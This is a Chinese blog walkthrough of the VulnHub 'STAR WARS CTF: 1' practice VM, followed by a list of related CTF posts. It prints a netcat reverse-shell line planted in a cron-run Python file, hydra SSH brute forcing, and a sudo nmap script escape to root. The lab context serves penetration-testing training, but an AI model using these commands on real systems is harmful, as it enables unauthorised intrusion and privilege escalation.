VulnHub渗透测试实战靶场 - STAR WARS CTF: 1

最新推荐文章于 2024-05-13 16:26:09 发布
最新推荐文章于 2024-05-13 16:26:09 发布
阅读量493 收藏 1
点赞数
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyj20010728/article/details/119922062
版权

VulnHub渗透测试实战靶场 - STAR WARS CTF: 1

题目描述

Star Wars themed CTF for beginners

This works better with VirtualBox rather than VMware

环境下载

NULLY CYBERSECURITY: 1靶机搭建

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
  • 目标靶机的 IP 地址为:192.168.56.111
  • 攻击机的 IP 地址为:192.168.56.102

渗透测试

信息搜集

用 Nmap 扫描一下目标靶机的端口信息:sudo nmap -sS -A -Pn 192.168.56.111,发现开放了 22、80 两个端口

用 dirb 扫描一下 80 端口 web 目录:dirb http://192.168.56.111

漏洞挖掘

  • 访问 http://192.168.56.111/robots.txt,提示
Why does the Jedi Order keep checking the robots.txt file.
Might take a look at /r2d2
He is the real OG.
  • 根据提示访问 http://192.168.56.111/r2d2
  • 查看 http://192.168.56.111/index.html 源代码,发现注释中有串 base64 字符串注明是密码,解密后出现了滑稽的一幕,先记录一下等会试试有没有用
  • 注意到前面的页面中存在两张照片,访问 http://192.168.56.111/images/,正好是这两张照片,下载下来分析时发现 png 图片有异常的数据,用 zsteg 查看一下发现真正的密码:babyYoda123
  • 但是不知道用户名是啥,继续用 dirb 探测一下 dirb http://192.268.56.111 -X .php,.js,.txt,发现存在 http://192.168.56.111/users.js,访问得到两个用户名 skywalker、han

getshell

  • 由于开放了 22 端口,用得到的用户名和密码组合尝试登录 ssh,发现 skywalker:han 可以组合成功

提权

  • 查看文件发现 han 家目录下有一个文件夹 .secrets,内有一个 note.txt,查看内容
  • 根据 note.txt 的内容,利用 cewlhttp://192.168.56.111/r2d2 进行信息收集制作密码集
cewl http://192.168.56.111/r2d2 > pass.txt
  • 继续用 hydra 爆破 skywalker 的密码,得到密码: tatooine
hydra -l skywalker -P pass.txt -f -V 192.168.56.111 ssh
  • 切换用户到 skywalker,继续重复前面的操作,发现内容
  • 查看用户 Darth 家目录下的内容,同样发现家目录下有一个文件夹 .secrets,内有一个 eval.py,其是一个可读写的可执行 python 文件,这个文件在一分钟后执行,我们修改其内容为
import os 
os.system("nc -e /bin/bash 192.168.56.102 1234")
  • 起个 nc,等待片刻,成功接收到反弹的 shell,先将 shell 转变成交互式的 shell
SHELL=/bin/bash script -q /dev/null
  • 执行 sudo -l 查看,发现可以通过 /usr/bin/nmap 来提权,成功拿到 root 权限
echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo /usr/bin/nmap --script=/tmp/root.nse
H3rmesk1t
关注
专栏目录
reactjs-starwars::star:ReactJS中的应用程序调用API并保存在Redux中,并使用其他Web技术
05-12
注意:如果用户位于葡萄牙语位置,则可以更改“ index.js”文件中的代码行以测试英语,该文件还包含此更改的文档。 指数 信息 关于 组件 标头 踢脚线 轮廓 清单 发展 环境设定 项目安装 项目执行 在项目中使用 图书...
quiz-star-wars::books:关于《星球大战》系列历史上某些要点的互动式测验
05-21
测验-星球大战 :construction: CJRM-Roger Melo JavaScript课程 :rocket: :construction:正在施工:construction:... :construction: :spiral_notepad: 关于 基于《星球大战》电影专营权历史中的点的互动式测验 ...
vulnhub STAR WARS CTF: 1 记录
qq_45826388的博客
09-22 419
Description Star Wars themed CTF for beginners kali:192.168.157.128 靶机:192.168.34.153 端口扫描nmap -A -p- 192.168.34.153 目录爆破:dirb http://192.168.34.153. 提示说 你需要找到密码 查看源码发现一串base64 解码发现没有用 查看wordpress 查看admin 发现robots.txt有提示 看不懂 查看主页的图片,是图片隐写 利用工具setgs
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.3
LYJ20010728的博客
08-09 693
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.3环境下载KIOPTRIX: LEVEL 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 KIOPTRIX: LEVEL 1靶机搭建 由于压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘 将原来的硬盘删去,选择下载好的靶机硬盘,并将网络适配器设置为NAT模式 打开靶机即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan
Hack djinn:1 : walkthrough【VulnHub靶场渗透测试实战系列7
重新启程
12-14 929
靶场地址:djinn: 1 靶场介绍: Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll...
VulnHub渗透测试实战靶场-HA:NARAK
LYJ20010728的博客
08-20 871
VulnHub渗透测试实战靶场-HA:NARAK环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.140 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
vulnhub Gigachad靶场练习
qq_51283187的博客
08-21 373
vulnhub Gigachad靶场练习 把IP的问题解决好,然后就开始渗透了! 首先信息收集,nmap 先ifconfig看看kali处于哪个C段 我这边是192.168.43.0/24 所以 nmap -sn --min-parallelism 100 --min-hostgroup 256 192.168.43.0/24 探测存活的主机 -sn 代表存活主机扫描,不进行端口测探。 –min-parallelism 代表调整探测报文的并行度,也就是在扫描同一台主机时会发送很多个探测数据包,这个参数
vulhub-Star Wars CTF:1
最新发布
2201_75378806的博客
05-13 268
经过探索,我们发现该目录包含一个名为“note.txt”的文本文件。有一个可读写的可执行python文件,并且该文件在一分钟后正在执行。爆破目录,在/imagess目录下正好是这两张照片,对目录详细爆破以下,加-X .php,.js,.txt试试。nmap的--script执行脚本,我们直接创建一个反弹shell脚本给它执行就可以得到root权限。现在我们得到了账号和密码,这边账号密码少可以一个个尝试,这边使用hydra。切换到主目录后,我们发现一个名为 Darth 的文件夹,其中包含一个名为。
kei-star-wars:https
04-15
在交互式监视模式下启动测试运行器。 有关更多信息,请参见关于的部分。 npm run build 构建生产到应用程序build文件夹。 它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。 最小化内部版本,文件名...
quiz-star-wars:在Alura的ReactJS v2 Immersion中大量使用
05-24
git clone https://github.com/mattheussAL/quiz-star-wars.git 在您的机器上启动项目 npm install npm run dev 或者 yarn yarn dev 科技类 掌握 :laptop: 朱莉安娜·阿莫塞(Juliana Amoasei) :laptop: ...
es6-star-wars:使用 ES6 的 SWAPI React 实现
06-01
在本项目"es6-star-wars"中,开发者利用了ES6的新特性,结合React框架,构建了一个基于SWAPI(Star Wars API)的应用。通过这个项目,我们可以深入了解ES6在现代前端开发中的应用,以及如何将这些新特性与React组件...
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1
LYJ20010728的博客
08-25 643
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1题目描述环境下载NULLY CYBERSECURITY: 1靶机搭建渗透测试信息搜集漏洞挖掘getshwll提权 题目描述 Nully Cybersecurity - this is an easy-intermediate realistic machine. While working with the machine, you will need to brute force, pivoting (using metasp
VulnHub靶场】——HARRYPOTTER第三部: FAWKES
Demo不是emo的博客
10-14 5201
这是哈利波特vm系列靶场的第三个靶场,总共有三个靶场,其中隐藏了8个魂器,前两部的靶场中我们已经找到了隐藏的5个魂器,今天这个靶场中隐藏了三个,意思就是今天的靶场有三个flag,话不多说我们来仔细瞧瞧
Vulnhub靶机】HarryPotter-Fawkes-哈利波特系列靶机-3
过期的秋刀鱼
09-13 1357
是一种针对缓冲区溢出的安全保护技术,通过对堆、栈、共享库映射等线性区布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的的一种技术。根据提示,是要让我们把21端口的流量 监听分析一下,同时,使用ip a发现,这应该不是靶机本体,应该是在一个docker中,根据ip地址进行判断,这个2222端口应该是docker中的ssh,所以我们并没有进入到靶机本体的22端口,Linux作为网络服务器,特别是作为路由器和网关时,数据的采集和分析是不可少的。
vulnhub之HARRYPOTTER: FAWKES
weixin_54431413的博客
05-26 1421
对发现的程序用edb-debugger进行调试,发现缓冲区溢出漏洞,找偏移量确定位置,注入payload,打点成功,信息收集,发现账号密码,通过ssh登录,tcpdump分析流量,成功跳出容器。最后利用堆缓冲区溢出提权成功。
Fawkes(vulnhub)
wcl20010的博客
05-29 1167
HarryPotter: Fawkes ~ VulnHub 此靶机难度高 目录 1.主机发现 2. 端口扫描 3.漏洞发现 Ftp 4.缓冲区溢出 使用edb调试server_hogwarts 攻击思路: 确定溢出位置: 5.反弹shell 构造exp 拿下靶机shell 升级shell 6.提权(信息收集) 信息收集 流量分析 提权 漏洞检测 漏洞利用 找网上的exp测试 ​编辑 执行 1.主机发现 arp-scan -l 2. 端口扫描
渗透测试】第七周 vulnhub-Fawkes
铃的杂货铺分铺
11-08 1130
渗透测试学习第七周,vulnhub靶场Fawkes靶机。 主机发现、端口扫描;FTP匿名登录;edb 调试程序;栈溢出攻击;tcpdump 流量分析;sudo 漏洞提权。
vulnhub:Nully Cybersecurity靶机
qq_43884092的博客
01-18 120
访问80端口,提示pop3账号密码,使用telnet访问pop3,密码列表可以由rockyou.txt生成
Vulnhub靶场篇:VulnHub2018_DeRPnStiNK
夜车星繁的博客
05-13 1287
靶场难度:中下难度 VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 攻击机win10:本机 靶 机IP:192.168.223.141 首先进行信息收集:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值